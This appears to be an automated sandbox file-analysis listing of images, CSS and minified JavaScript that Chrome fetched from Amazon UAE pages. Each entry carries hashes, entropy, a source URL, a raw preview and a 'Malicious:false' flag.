                                                                                                                                                                                                        MD5:49B8BA12EA2FD2FCB8CDE5CEB044255D
                                                                                                                                                                                                        SHA1:8C6534745142D6C4F4A1F9A7DCC6AF1EC2DA389B
                                                                                                                                                                                                        SHA-256:C9B1E0CB1BE75194CA37F22F383DD8D515153B8BC13C288595A112E6DCC7A292
                                                                                                                                                                                                        SHA-512:F000E323A2793EB54FCDF0284326CEA080E45161BD83166737AB1AF4D16EDC63D328B8436E8C00EF036680FDFB2013B3F5DCA0C7B4148D512998A11F2E87A2F4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07fsr5k7g_379x304_ae-en._SY116_CB623005785_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!Aq..."12Qa.4BSr....$3R......%6Dbtu.................................................1."2ABCQ............?...." "'.......qN..9.76...w.1...7..X......q.c......n...=....$E....t..}.q..K..~.m..y..q...i9........v.bw%.....zg.h.....3m.M...9=.-D.?.-.4.D..{.........6...""." ""." ~=.J..o.Z.6...;}.f.\]et.8....Q..C....,.....K..V.K.&5.}q.......<.rr..M.3..e.].v.K.+.r..U.j.G...t."..Y.|{+]......"O\...=.............Uk(...U....V..F......7h............#"..l....z|.j....m...0.~G..V'..............<Qb..~..6.....i.W...0p.V..l...s....]Kr.d-..'>.j.......{]=.....g..U/oE..v}..fIh|)...u.9Z..Z....z..^.}._U...\=...;U.Gp...x..m..j.:..np...9a*...m.).qJ.)-.".Z.ns..L.\..m2..m..;.....>..i..+0.....&.fY[w^q.5$D@DD.D@DD...fy..vG...M6..Vc:.>e.`...X....Z.....N
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Asi%26si%3D946%26pc%3D5787%26at%3D5787%26t%3D1723729113767%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5787
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5432), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5432
                                                                                                                                                                                                        Entropy (8bit):5.075526870751628
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:/Sm/593ZjXRm1Tmbvn3M9UqCuvWfhX27+jW:/XZRmYbk9+hX2KjW
                                                                                                                                                                                                        MD5:368CE33EB4A123589EDF22909A5DA403
                                                                                                                                                                                                        SHA1:A45C394E67A4B9B24A041709A9EE93887EA70011
                                                                                                                                                                                                        SHA-256:14A51947C7E59E5FB51284DF59673595073D9A07243D664F82B904B10ECBFF4B
                                                                                                                                                                                                        SHA-512:25D2E3AB05518860AA40DA27B9DDF34F6CF012D1EB44FAD6D0A6EFC7388DE3DB253B60B473F233A11593D6133853601EAEE0F2EEA37D113BBE17FFC6ED98A275
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/21cwI2AAWQL.css?AUIClients/CVFAssets
                                                                                                                                                                                                        Preview:.cvf-account-information-box-profile-image{border-radius:50%;height:33.33px;width:33.33px}.cvf-account-information-box-profile-details-padding{padding-left:10px}.cvf-account-switcher-add-account-icon{background-image:url(https://m.media-amazon.com/images/S/sash/Pq46CmXZMTyTAdQ.png);background-size:contain}.cvf-account-switcher-add-account-icon-v2{background-image:url(https://m.media-amazon.com/images/S/sash/zM47PAGmHg9UEN-.png);background-size:contain}.cvf-account-switcher-personal-account-icon{background-image:url(https://m.media-amazon.com/images/S/sash/ES3wBGFTd2QLjwc.png);background-size:contain;background-repeat:no-repeat}.cvf-account-switcher-business-account-icon{background-image:url(https://m.media-amazon.com/images/S/sash/wZEwSHH87jmThSc.png);background-size:contain;background-repeat:no-repeat}.cvf-account-switcher-check-mark-icon{background-image:url(https://m.media-amazon.com/images/S/sash/bFjL-3p8JvQ2T9J.png);background-size:contain;width:50px;height:50px;background-repeat:
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 400 x 750, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):27972
                                                                                                                                                                                                        Entropy (8bit):7.9746563718982335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:PYh3ZcLbZnL3Azzh2/99/KL6sFxvjCENS:A8397Afhgjq6yv9NS
                                                                                                                                                                                                        MD5:1B5A1FB097715B1604B21ABA92EF6A3E
                                                                                                                                                                                                        SHA1:C4A765AEDD886DC04D89E7E93B6A02C59ECB7013
                                                                                                                                                                                                        SHA-256:437E95A363A4291060E34BA170E043274E0155821E9BE374F35DE3C4F13CBAA5
                                                                                                                                                                                                        SHA-512:0DD02CB398A22092732CFAE2B141F5327360A42E931AFD27AAF8EAE402C8C36EF0BB5EDEA82EB39E66567DAED1CAA79B70CA4BF41D30387653563D0A78AB9B0E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/mPGmT0r6IeTyIee.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE...*AC.38.'0")0!*"NT[......333............dim/8@/8A`goWVS. !...QV\...bejeee>AC......[bj}..PW`YtS............mwxjpv...MSY`fi;=@KR[......_di......djr....................................V]e...u....8,3..!..2..:...u..v....=?A,..j.......8...m.02.u..@).ojBGL0....."....8>D.n...2..9;=.>/..B..[........@@A.v......D4.)."..J.B? ..H..432...\.[..:H..#)-....* ...............................B.......................#......G.......P..J..:.................B..9..int.s..d.5g....I..9..I..jqwqz}.]I.. ..D.....E..$.......T....]...=..............cgk.....L...t.vm.OM.+......+.g...#........'..Q.ZY.%.f@.y................................P.1..<...N./..>......................s.i...P.........}...y...........;..;.F5.G6........%.............(Z"....tRNS............*......<.......{...%Zk.I....F~.....................*..Z<.......]...t..}.`'......h.....;....{..K..........L......^..e....B.*b.|..............d.....O....................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D61668%26at%3D61668%26t%3D1723729136979%26csmtags%3DstartVL%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DXRRBVETR66S3T97BM5KF%26aftb%3D1%26lob%3D1:61668
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1], progressive, precision 8, 235x500, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):27398
                                                                                                                                                                                                        Entropy (8bit):7.976633760185561
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:VAyEgCZ2G1D+T03SerKafj8HQRlUC7xbN:SyZCokDj3Sexb8Ha2CFN
                                                                                                                                                                                                        MD5:A588B668A6B88071362008C20076E3FE
                                                                                                                                                                                                        SHA1:335CD71892BCAAA37279864C1DCEF92F847E8A99
                                                                                                                                                                                                        SHA-256:3A4ACBEF5045C0A3824958E15CD264760DAC4C3F24748F763B3ED81A7A652AC3
                                                                                                                                                                                                        SHA-512:3F87BFACCB6CDF9E54FA606362754B46028AD6BD886B57140FF6D71D514E3E8AD58252889AD1313223345B98AC43563C3E4860F466C4EBF321A862DFFD8BE664
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/41U8j6G8JZL.jpg
                                                                                                                                                                                                        Preview:......JFIF.............JExif..II*.......i.........................,...............Version 1.0.0.................................................. ....+!.$...2"3*7%"0....................".........................."..............#............."..........5..................................................................WX..Z~........?<.^...,]..i..K..<..t5}O..L|...2..........o..M]..h.f....7<.y.n..\...6{..Y.g.}....n.:.#./...z.u.G...K..9.-.,.I.uw=p..[.._.Y....:..,.=..+_k...4.....f.......MT.....!...=..[.........?Fk...K.3.a..=....l{...-J........7..K./.4[f...|.J6.:.2.....n....xQ...>u.O..p.............F..^7..g...m..K...g..Cn.6..~...U.\A........A.......}9^9..s.^../x...._=..fg.....1zW.....k...s.5.]...l(..*N..m.Q$p....s......n-...K\T.[..y......~y.....<.z..Z.....5......}5....l3>..-d.HG.c...!z.7.*26....3.....-.,.O...[.;..5......v.L:!...c.i.#VAQ.2h..)kj}=@LT..b.|..C.P..q.kN....X.....&......X)l.}md.N....&.k...m.}..?fc....7c.......4@Y...>......p..].G....-.^.(|
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8327
                                                                                                                                                                                                        Entropy (8bit):7.737215838786652
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ePwcly0XixCa94KxYpCXcZ+7YH9icDVXfdCACtpP2dUClJ:r6XQB94K3D7YH9RDVlJIMdU0
                                                                                                                                                                                                        MD5:0ED4C8CAB7485BA7C52ADAB0109CD52F
                                                                                                                                                                                                        SHA1:BD0D412BE62B3F4890CC3A3F54CC6AA5505B4EC3
                                                                                                                                                                                                        SHA-256:3FB55228D8FA31E9D5B8416B2141206E8CB051BB2FC9EF6EE3A1EE5C13649635
                                                                                                                                                                                                        SHA-512:C39BFDDF64F3EBB16AF0BB13A23B15B1253C8E1578663A992C4873F4CE471BD785DF86E52F5161ED4C7D779018B341432B9679A03050DD3FF4E02E4A07B4C9B9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1.........................................................................................................................................................................................................k..'.}9.............}.|......}~|.._. .....'....G.g.'............}.|w.b......g.W..a..........<......@.3...:A.I0....=.&..D...D...$.........G4.L...jsZt..4..,..W..._.....+.fY.0zd>X...$XV...."n...... s..../Uv..x.W]Sb...^6.p..`...5.5.6.}.._Ci2..-O...9..M.....u.t.q..*.o...G.4.....,G..."n...... s...AU.T._.Z.r...r ..Mf....!.u..Y.>...:]Y0...,.....v.%.78.ZG....I.dJ{.....|..M..p........@.`.....{.^K:......I..6.:w.eC....^...x....C.d._..38F.*.a...w..d...s.G........:<..."X..b.`..&........<..(.ri.........p..b.{.Fs..[.e..U1.M1.E,..|.^iB..].p...A.v.-.+.x...p..j......W............ g.<.m.*..Y..[.^...."5
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (30956)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):31002
                                                                                                                                                                                                        Entropy (8bit):5.263859562616461
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:HkhQ+LMasRxY7xky/1VXYmkDsdJS4Ok0o0MRbjigQeUpteUHiyYNDbDUhBGP95xD:AQms7kx9E4Ok2rKLP9
                                                                                                                                                                                                        MD5:055C05372F5DFC6548345AC9EEAE6E31
                                                                                                                                                                                                        SHA1:81AE805B0ACE186FEDAFFB681415144B73860388
                                                                                                                                                                                                        SHA-256:7D14FAAF807F0DECFDF513F91AAD06F18704B4DE223201E16A638F42F91DEED9
                                                                                                                                                                                                        SHA-512:E37106F6CA36CAFBF3041466F14DEA1E89C0CF7788E1536A0B82DB4D39BF15BE538FE5E793AE119AF813F75AE7DEFD68BB8D3E0832D992181CAAA089C4D57CD8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.16755e0b.js
                                                                                                                                                                                                        Preview:(()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature","cf",e),a("criticalFeature","cf",t),a("loaded","ld")),o=a("loaded","ld",e),l=(a("loaded","ld",t),a("viewablelatency:bodyBegin","bb",i),a("viewablelatency:loaded","ld",i),(e,t)=>{console.error(e,t)}),d=e=>{e.sendLatencyMetric(n),e.sendLatencyMetric(r)},c=e=>"V"===e,h={1027:"Sponsored Display DRA"},m={1:"Enabled",0:"NotEnabled","-1":"Unknown"},u=e=>v(e),v=e=>decodeURIComponent(escape(atob(e))),p=e=>e&&0===Object.keys(e).length&&e.constructor===Object;let g=null,w=null,b=null,f=null,y=null;const C=new class{viewabilityStandards(){return f=f||[],f}payload(){return b=b||{},b}},M={ext:{inViewPercentage:()=>(g=g||0,Math.round(100*g)),geom:()=>(w=w||{},w)}},x={playingTime:()=>(y=y||0,y)},E=()=>C,P=()=>x,T=e=>{var t,i,a,s;g=void 0!==(null==e|
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12571
                                                                                                                                                                                                        Entropy (8bit):7.918578056569039
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:YQxx2We9K0yhkAnzHpWbO2JRKLQSW0jJqSau4ehf02tTC/C7zx6uX5ztCe8GBS:LPYK0u7dJQJ0Lau4eh82tAAxBzoGBS
                                                                                                                                                                                                        MD5:3AC30A09C64477A1A143D9455417C38E
                                                                                                                                                                                                        SHA1:F53FBAC6BDC74E2B7E305A97719B27E64CCB5AA0
                                                                                                                                                                                                        SHA-256:45C9BD5EFB1C71BAA1F55B6E32EBF3A39CD989E16C01C6EDA0D3D7DDF125D229
                                                                                                                                                                                                        SHA-512:E035510CB2E1CDDBA293F537A48751039B74E0BD03B0290DD495420D58FB6A584A2632B59AA2682C691FEA9C899AE21E251A24709A787C5B4C0677E93E590D37
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259754_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................................................................................................................."..........2............................................................................:..L..S.1h...c7.............5.|.m.jq.oW..p....gkQ5......l..l.O ........W..uZ~r............k.z...+.5a.P............F..E...........I.M...zx.....?T>~.a0.#N.{.<z.n.q1..M1..d.a....kbcc...S....6..o3k.<5..hH.$..s}.O...._[.i.:...]cW.__.:{9..N..>....;8x..A..:-jOE.z.....<..g..Q?g.._.2...}g....$.W.o...E.nh....U.T{g....a....T.|.g......Ml.@...x..7&;.\7..........!.1..l.n...[........t6s.....~.#.P..S.S{g.....o.....x.{IN.^.'+..T....Vw.".0.<B=..[.>.v........g.....O #.-.2t..H.......42....._d.....<.....P'......k.....Gu........wX+p..=.7o..k..z..;..`..OqQ....9.....I..%...*.Y..[.4..2..>..e...........X+p......N.z<...=).........>y......B...00...0......"5...}r..............U.S....H...UkU..;..y.~3._0.`a..>F..X.s.E.2.>..\...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4095
                                                                                                                                                                                                        Entropy (8bit):7.743327463635847
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:tUZqdvEba+kHCIjOTNa09i6Gw5q4fZI0fQqfD/KggfLbg3:aZqdvSarHCI2Na8X5q4hhb/wfLO
                                                                                                                                                                                                        MD5:9DD28A07312AC0BE48AF4F1819E9DDF0
                                                                                                                                                                                                        SHA1:FEE2552A4D89C7138F0F1995012F6C32B2FFF5C5
                                                                                                                                                                                                        SHA-256:F7D82D684B552273A06E2FB456D05F0ADC4A7873E3AF2EA07D930223280ADAB0
                                                                                                                                                                                                        SHA-512:618B09AB91B216E6128E15AE95268816F8BFC5ED7D2DD253C976A91476926D1767A3BA82FEF635ADF79FFDBEF2FD4C0EA95826FEBFBC8DD30197345F964D9E79
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334872_186x116_1X_en_AE_3._SY116_CB597773556_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........:.......................................................................................1...z....l.6..h%8.Tv.L...lL..e..r=.J......<C.<)X...X.{."7..=..E..............E....a.D..E...L}..D...q.u........;1V.G.....-L/.8o...?...R..jF.v.............mhkt...A.6.b...^."]".........J......q........i.Y~...ZL.K@....j{Uo..D.........#..@..............H........................4...$.3@..#%ST.....!"5CDQUt...&APdesu 1Ec.............?....H...+..g...s.#.,E..\..3.w...N..4.'.T...%8.D..iu..7..`l>.\.1...-|.'.L..L...NG....|,S....N.Jl..9...X.uK.J....b..('.Xy....~.%...$....1 ..)P..!,[..'.......[l..\.*~aAwc>Zs...._.n...7..=...f.O...ng...3.F.^W..n..|...<R.?....Kl..`.......nI..........Gr=...+|.S.N.U.c.....j...x..t..D.{.~.k...<.......'x.....E..P...... ....{.]8...n@I%j......< ....BI...(S.G..E._q..m.?/QS...n.W
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11226
                                                                                                                                                                                                        Entropy (8bit):7.889421574582735
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Y+xdKDWtCYFghY0PrSKrIdwLSAOP82dRiuTxs70FxHXwCM42DbTymm9kZ:fYxYFghb7JOPjXin70fHg7DCkZ
                                                                                                                                                                                                        MD5:B71C330DA7B832FEDD32EE894DA6359D
                                                                                                                                                                                                        SHA1:C406DA2D0920291CA6AAD71E9CE98D1092C3259B
                                                                                                                                                                                                        SHA-256:6832010C124A2842EBB2439CC06E2379EBB86EF536952CF16D5B9F1A664592F4
                                                                                                                                                                                                        SHA-512:06148C320B3C7FE6C27A2D383850D2FEE9AB92593EE94F81545B831F083C4FC79942A63275DD80785295D1BB7E6A3868D6A1F5441251A387B8289B50548A807B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................x).}W.op.D..hOjl<...............z.}m.j|.oW........kQ5.....R.w.:r.........}o.U..]..@.......oZ.v..+.5a.P.......4|.K.b.B,...........Mzl...t.......G..>..a."...gB..\8x...<N3^..C9..>o.......\u.....hH.$..y...@...}o..`..,......=~Xc.>.zy....>Z..0...&...^...).......I.P......E.nh..C..........t..O..Z.#g...j.m..-U..W..............s{.{.........0.....?F..p....,0.{*.m.)r....S...k......j....H.......Ku............. ....i.N.WwKN,..4lC.3.c..p.&..]TG;.g^....S.U.Jt.T.5~.N.....{..v..X.~x....;..........e.F.?..3Z+./".8oy.95a...q.>..5.e......Y.2%.E1.u.].`S......k.........L0z....p\.gO...Z..-...N...P.1.=...qY..hp^.8.......p8..o&...C...N.........)WiO[.^......>w.......#..^x.H....Ev.Z..umq.G..5.#...%..8.g..:.u..}........|.5.4N.....1
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 362x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13456
                                                                                                                                                                                                        Entropy (8bit):7.940912198770141
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:jruofJlxS4PrlxI/8Fox1bEM4/NehwXsSW:fusWSlnFwbEMkNl8SW
                                                                                                                                                                                                        MD5:D953926549D0ACA42CB872CC673F392B
                                                                                                                                                                                                        SHA1:C44FA5825695F0B7E0609FED06BFAD9285E78E9D
                                                                                                                                                                                                        SHA-256:5D9B7ECCCBA9D893BF345AF8E1B70C021FD1648238E4A1F3BB0C68F96BD2E6C3
                                                                                                                                                                                                        SHA-512:B2057DB8B8BC5EAFE8C20D59A1C95875B88F729436A106C70E366015241F41DA9941E05F5B2DD4131DF8BD5A9B0F3A690472BC9A5C0E5641173B4F04093AACF0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/611TWGHXWyL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........j.."..........1...................................................................U....z..e.V.....^v~..:R..[r]."2....................G..b,..7e....Z.....p...u.5.[.._.l..Y%..W.u0.......................M.zgD.n.V6t.......m.re.[T.$..u.ud.n.@.............5Ok9t{..O.r.i6...}.....[i....\.|...`QU..W0..[C.W..W.,........................s...=.k9_To.D.$.D.....Ij.......8.,...m.f...y56 s..5u..a0hc%.Ff.Sv~._,2.i..%y.!7/4~A(..,..Y0.4.j.........<e..S..rEcT...+.+Ia..9A......,.)"Y"JR.....#.q......1..yl.7.0.%.Y.3..`._........l..gkk0|.^c%.D,.".U.Z.z..'....S0."...t..e......F.5.|..Z...-._X2....U.Y.b.......4t.......r..'A.s.Qh.SO..........WB...Y...:Oo..<Vj...}..Yr...SZe.c.[. .*X".._.uA...2=...1...pQ.eeO[l....7..[....*..f..l.....D......eL.z....,;.._.!".9....;,+......."Ul..A...Q...s.....^..........q.<.....`.f\..i>.o.~.l
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (48840)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):48888
                                                                                                                                                                                                        Entropy (8bit):5.316989310603465
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:1t0pkZtsaOoGHKsN3+xmxbQGdDYOeSYNkBc7J1VQzqr+JkqR6VhkPlN8Opgydi20:1t0ODIN/EOgJ1VQHZR6VO9N8OKydnpEj
                                                                                                                                                                                                        MD5:54586B09CF42FDBC1BC3F8D144A9C9CE
                                                                                                                                                                                                        SHA1:8792BBE8179A6965653EF878554BCF90C3807A3B
                                                                                                                                                                                                        SHA-256:A67E8235A7759CE78E2B5D3F145CFB07665F37F1257D1C8B80EB0136E1DD7784
                                                                                                                                                                                                        SHA-512:75F28B09EF56BBCCA53E66963F6DF228E284A2604A0692939838F0989A51B14DB0C49B1EA92E306B43DCD2AAD83E5ACD0CF427973C5F20074FEDCBBF0F564A64
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/DAsf-1.50.dcad56b6.js?csm_attribution=APE-SafeFrame
                                                                                                                                                                                                        Preview:(()=>{function e(e){return e&&e.__esModule?e.default:e}var t=function(e){return e.replace(/_/g,":")},i=/(\/b|\/s|\/l).*(node=)(\d{1,12})/,n=new Map,a=function(){if(!n.has(window.location.href)){var e=i.exec(window.location.href),t=e&&e[3]?e[3]:null;n.set(window.location.href,t)}return n.get(window.location.href)},o=function(e){var t=a();if(!e||!t)return null;var i=e.split(":");return i.splice(i.length-1,0,t),i.join(":")},s=function(e){var t=a();return t?"".concat(e,":").concat(t):null},r={wb:"ues",bb:"uet",af:"uet",cf:"uet",be:"uet",ld:"uex"},d=function(e){var i,n,a=e.latencyEvent,r=e.scope,d=e.placement,p=e.timestamp;l(a)&&(c(a,m(r),d.id,p),c(a,m(r),t(d.name),p),c(a,m(r),null!==(i=o(d.name))&&void 0!==i?i:void 0,p),c(a,m(r),null!==(n=s(d.id))&&void 0!==n?n:void 0,p))},l=function(e){return"function"==typeof window[r[e]]},c=function(e,t,i,n){void 0===n&&(n=new Date);var a=r[e];i&&"function"==typeof window[a]&&window[a](e,t+i,{wb:1},n)},m=function(e){return"adplacements:"+p(e)},p=functio
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12239
                                                                                                                                                                                                        Entropy (8bit):7.948646559390208
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EVefiwpUW1HVQpqAqTs+BaIsjLHCn2hcqE2z6mmVb2tpyF/ZmWBRTThF6J3/+:E8fvtR2pqAqTsrICbPE24F4WBBlF6F+
